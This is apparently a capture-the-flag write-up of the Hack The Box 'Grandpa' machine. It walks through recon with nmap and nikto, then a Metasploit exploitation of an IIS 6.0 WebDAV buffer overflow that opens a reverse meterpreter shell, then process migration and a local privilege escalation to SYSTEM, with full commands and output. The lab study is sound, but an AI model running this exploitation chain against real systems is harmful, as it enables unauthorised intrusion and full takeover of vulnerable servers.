Grandpa
Introduction:
The “grandpa” is an easy windows machine with a CVE exploit using metasploit. Since the machine is very old, its also vulnerable to many other exploits that you can chose from for the privilege escalation at the end. The key takeaways for me were
- Based on the CVE you are exploiting, determine if you need to migrate your process on the target box to another.
- Know the popular exploits thoroughly. Picking the correct exploit is important but also make an assessment if you could potentially crash the machine in that process.
Recon
NMAP scan
1nmap -sS -sV -T4 -sC -O -oN nmap.grandpa.txt 10.10.10.14
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-30 16:47 EST
3Nmap scan report for 10.10.10.14
4Host is up (0.015s latency).
5Not shown: 999 filtered ports
6PORT STATE SERVICE VERSION
780/tcp open http Microsoft IIS httpd 6.0
8| http-methods:
9|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
10|_http-server-header: Microsoft-IIS/6.0
11|_http-title: Under Construction
12| http-webdav-scan:
13| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
14| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
15| Server Date: Wed, 30 Dec 2020 21:56:17 GMT
16| Server Type: Microsoft-IIS/6.0
17|_ WebDAV type: Unknown
18Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
19Device type: general purpose
20Running (JUST GUESSING): Microsoft Windows 2003|2008|XP|2000 (92%)
21OS CPE: cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_2000::sp4
22Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows Server 2008 Enterprise SP2 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 or Windows XP Professional SP1 (90%), Microsoft Windows XP (87%), Microsoft Windows Server 2003 SP1 - SP2 (86%), Microsoft Windows XP SP2 or Windows Server 2003 (86%), Microsoft Windows 2000 SP4 (85%)
23No exact OS matches for host (test conditions non-ideal).
24Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
25
26OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
27Nmap done: 1 IP address (1 host up) scanned in 15.86 seconds
28
Notes:
- Port 80 is open and runs IIS 6.0 with Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
- http-webdav is in use which could be a potential entry point
- Port scanner did not report any other open ports
- Next steps could be -
- Nikto scan
- Advanced nmap scripts
- Webdav and webserver enumeration
Web recon
Visit the website using the browser -
Enumeration
Nikto scan
1nikto -url http://grandpa.htb
2- Nikto v2.1.6
3---------------------------------------------------------------------------
4+ Target IP: 10.10.10.14
5+ Target Hostname: grandpa.htb
6+ Target Port: 80
7+ Start Time: 2020-12-30 16:55:28 (GMT-5)
8---------------------------------------------------------------------------
9+ Server: Microsoft-IIS/6.0
10+ Retrieved microsoftofficewebserver header: 5.0_Pub
11+ Retrieved x-powered-by header: ASP.NET
12+ The anti-clickjacking X-Frame-Options header is not present.
13+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
14+ Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
15+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
16+ Retrieved x-aspnet-version header: 1.1.4322
17+ No CGI Directories found (use '-C all' to force check all possible dirs)
18+ Retrieved dasl header: <DAV:sql>
19+ Retrieved dav header: 1, 2
20+ Retrieved ms-author-via header: MS-FP/4.0,DAV
21+ Uncommon header 'ms-author-via' found, with contents: MS-FP/4.0,DAV
22+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
23+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
24+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
25+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
26+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
27+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
28+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
29+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
30+ WebDAV enabled (UNLOCK SEARCH MKCOL COPY PROPPATCH LOCK PROPFIND listed as allowed)
31+ OSVDB-13431: PROPFIND HTTP verb may show the server's internal IP address: http://10.10.10.14/
32+ OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
33+ OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
34+ OSVDB-3233: /_vti_inf.html: FrontPage/SharePoint is installed and reveals its version number (check HTML source for more information).
35+ OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1376. http://www.securityfocus.com/bid/2252.
36+ OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
37+ /_vti_bin/_vti_adm/admin.dll: FrontPage/SharePoint file found.
38+ 7937 requests: 0 error(s) and 27 item(s) reported on remote host
39+ End Time: 2020-12-30 16:58:51 (GMT-5) (203 seconds)
40---------------------------------------------------------------------------
41+ 1 host(s) tested
The _vti_rpc link discovered in dirbuster and nikto scan will reveal that the server uses Microsoft Frontpage and that could be a possible path however my initial tinkering with it did not end up in success.
Search for the possible vulnerabilities
1# searchsploit webdav | grep -i iis | grep remote
2Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow | windows/remote/1.c
3Microsoft IIS - WebDav 'ScStoragePathFromUrl' Remote Overflow (Metasploit) | windows/remote/41992.rb
4Microsoft IIS - WebDAV Write Access Code Execution (Metasploit) | windows/remote/16471.rb
5Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22365.pl
6Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22366.c
7Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22367.txt
8Microsoft IIS 5.0 (Windows XP/2000/NT 4.0) - WebDAV 'ntdll.dll' Remote Buffer Overf | windows/remote/22368.txt
9Microsoft IIS 5.0 - WebDAV 'ntdll.dll' Path Overflow (MS03-007) (Metasploit) | windows/remote/16470.rb
10Microsoft IIS 5.0 - WebDAV Remote | windows/remote/2.c
11Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav) | windows/remote/51.c
12Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure | windows/remote/26230.txt
13Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
14Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
15Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
16Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
17Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP) | windows/remote/8765.php
18
Exploitation
The WebDAV ‘ScStoragePathFromUrl’ related vulnerability seems to apply and seems fairly simple and safe to execute.
1searchsploit -m windows/remote/41738.py
2 Exploit: Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow
3 URL: https://www.exploit-db.com/exploits/41738
4 Path: /usr/share/exploitdb/exploits/windows/remote/41738.py
5File Type: ASCII text, with very long lines, with CRLF line terminators
6
7
Metasploit
1msf6 > use windows/iis/iis_webdav_scstoragepathfromurl
2[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
3msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > show options
4
5Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):
6
7 Name Current Setting Required Description
8 ---- --------------- -------- -----------
9 MAXPATHLENGTH 60 yes End of physical path brute force
10 MINPATHLENGTH 3 yes Start of physical path brute force
11 Proxies no A proxy chain of format type:host:port[,type:host:port][...]
12 RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
13 RPORT 80 yes The target port (TCP)
14 SSL false no Negotiate SSL/TLS for outgoing connections
15 TARGETURI / yes Path of IIS 6 web application
16 VHOST no HTTP server virtual host
17
18
19Payload options (windows/meterpreter/reverse_tcp):
20
21 Name Current Setting Required Description
22 ---- --------------- -------- -----------
23 EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
24 LHOST 10.0.0.8 yes The listen address (an interface may be specified)
25 LPORT 4444 yes The listen port
26
27
28Exploit target:
29
30 Id Name
31 -- ----
32 0 Microsoft Windows Server 2003 R2 SP2 x86
33
34
35msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost tun0
36lhost => tun0
37msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
38rhosts => 10.10.10.14
39msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set target 0
40target => 0
41msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
42
43[*] Started reverse TCP handler on 10.10.14.25:4444
44[*] Trying path length 3 to 60 ...
45[*] Sending stage (175174 bytes) to 10.10.10.14
46[*] Meterpreter session 1 opened (10.10.14.25:4444 -> 10.10.10.14:1030) at 2020-12-31 13:23:13 -0500
Interact with the meterpreter shell and run exploit suggester
1meterpreter > getuserid
2[-] Unknown command: getuserid.
3meterpreter > getuid
4[-] 1055: Operation failed: Access is denied.
5meterpreter > sysinfo
6Computer : GRANPA
7OS : Windows .NET Server (5.2 Build 3790, Service Pack 2).
8Architecture : x86
9System Language : en_US
10Domain : HTB
11Logged On Users : 2
12Meterpreter : x86/windows
13meterpreter > background
14[*] Backgrounding session 1...
15msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search suggester
16
17Matching Modules
18================
19
20 # Name Disclosure Date Rank Check Description
21 - ---- --------------- ---- ----- -----------
22 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
23
24
25Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
26
27msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use 0
28msf6 post(multi/recon/local_exploit_suggester) > show options
29
30Module options (post/multi/recon/local_exploit_suggester):
31
32 Name Current Setting Required Description
33 ---- --------------- -------- -----------
34 SESSION yes The session to run this module on
35 SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
36
37msf6 post(multi/recon/local_exploit_suggester) > sessions -l
38
39Active sessions
40===============
41
42 Id Name Type Information Connection
43 -- ---- ---- ----------- ----------
44 1 meterpreter x86/windows 10.10.14.25:4444 -> 10.10.10.14:1030 (10.10.10.14)
45
46msf6 post(multi/recon/local_exploit_suggester) > set session 1
47session => 1
48msf6 post(multi/recon/local_exploit_suggester) > run
49
50[*] 10.10.10.14 - Collecting local exploits for x86/windows...
51[*] 10.10.10.14 - 35 exploit checks are being tried...
52nil versions are discouraged and will be deprecated in Rubygems 4
53[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
54[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
55[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
56[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
57[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
58[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
59[*] Post module execution completed
Post-exploit/PrivEsc
You can use ms14_070_tcpip_ioctl to elevate our access -
1msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl
2[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
3msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show optins
4[-] Invalid parameter "optins", use "show -h" for more information
5msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > show options
6
7Module options (exploit/windows/local/ms14_070_tcpip_ioctl):
8
9 Name Current Setting Required Description
10 ---- --------------- -------- -----------
11 SESSION yes The session to run this module on.
12
13
14Payload options (windows/meterpreter/reverse_tcp):
15
16 Name Current Setting Required Description
17 ---- --------------- -------- -----------
18 EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
19 LHOST 10.0.0.8 yes The listen address (an interface may be specified)
20 LPORT 4444 yes The listen port
21
22
23Exploit target:
24
25 Id Name
26 -- ----
27 0 Windows Server 2003 SP2
28
29
30msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set target 0
31target => 0
32msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lhost tun0
33lhost => tun0
34msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set lport 4455
35lport => 4455
36msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -l
37
38Active sessions
39===============
40
41 Id Name Type Information Connection
42 -- ---- ---- ----------- ----------
43 1 meterpreter x86/windows 10.10.14.25:4444 -> 10.10.10.14:1030 (10.10.10.14)
44
45msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
46session => 1
47msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
48
49[*] Started reverse TCP handler on 10.10.14.25:4455
50[-] Exploit failed: Rex::Post::Meterpreter::RequestError 1054: Operation failed: Access is denied.
51[*] Exploit completed, but no session was created.
52msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > ps
53[*] exec: ps
54
55 PID TTY TIME CMD
56 3321 pts/1 00:00:00 sudo
57 3322 pts/1 00:00:00 su
58 3323 pts/1 00:00:00 bash
59 3348 pts/1 00:00:30 ruby
60 3622 pts/1 00:00:00 ps
61msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions 1
62[*] Starting interaction with 1...
63
64meterpreter > ps
65
66Process List
67============
68
69 PID PPID Name Arch Session User Path
70 --- ---- ---- ---- ------- ---- ----
71 0 0 [System Process]
72 4 0 System
73 272 4 smss.exe
74 324 272 csrss.exe
75 348 272 winlogon.exe
76 396 348 services.exe
77 408 348 lsass.exe
78 588 396 svchost.exe
79 664 1084 cidaemon.exe
80 680 396 svchost.exe
81 736 396 svchost.exe
82 764 396 svchost.exe
83 800 396 svchost.exe
84 932 1084 cidaemon.exe
85 936 396 spoolsv.exe
86 964 396 msdtc.exe
87 1080 1084 cidaemon.exe
88 1084 396 cisvc.exe
89 1124 396 svchost.exe
90 1180 396 inetinfo.exe
91 1220 396 svchost.exe
92 1316 396 VGAuthService.exe
93 1408 396 vmtoolsd.exe
94 1456 396 svchost.exe
95 1600 396 svchost.exe
96 1708 396 alg.exe
97 1804 588 wmiprvse.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\wbem\wmiprvse.exe
98 1912 396 dllhost.exe
99 2304 588 wmiprvse.exe
100 2464 348 logon.scr
101 2504 1456 w3wp.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\windows\system32\inetsrv\w3wp.exe
102 2572 588 davcdata.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\inetsrv\davcdata.exe
103 2620 2504 rundll32.exe x86 0 C:\WINDOWS\system32\rundll32.exe
104
105meterpreter > migrate 2572
106[*] Migrating from 2620 to 2572...
107[*] Migration completed successfully.
108meterpreter > background
109[*] Backgrounding session 1...
110msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > run
111
112[*] Started reverse TCP handler on 10.10.14.25:4455
113[*] Storing the shellcode in memory...
114[*] Triggering the vulnerability...
115[*] Checking privileges after exploitation...
116[+] Exploitation successful!
117[*] Sending stage (175174 bytes) to 10.10.10.14
118[*] Meterpreter session 2 opened (10.10.14.25:4455 -> 10.10.10.14:1033) at 2020-12-31 13:34:40 -0500
119
120meterpreter > getuid
121Server username: NT AUTHORITY\SYSTEM
122meterpreter >
123
124
Notes:
- Remember to migrate to another process such as “svchost” from network so that you can broden the scope of your privilege escalation
- This process migration will come in handy over and over as you do more machines and I would consider this as a “common gotcha”!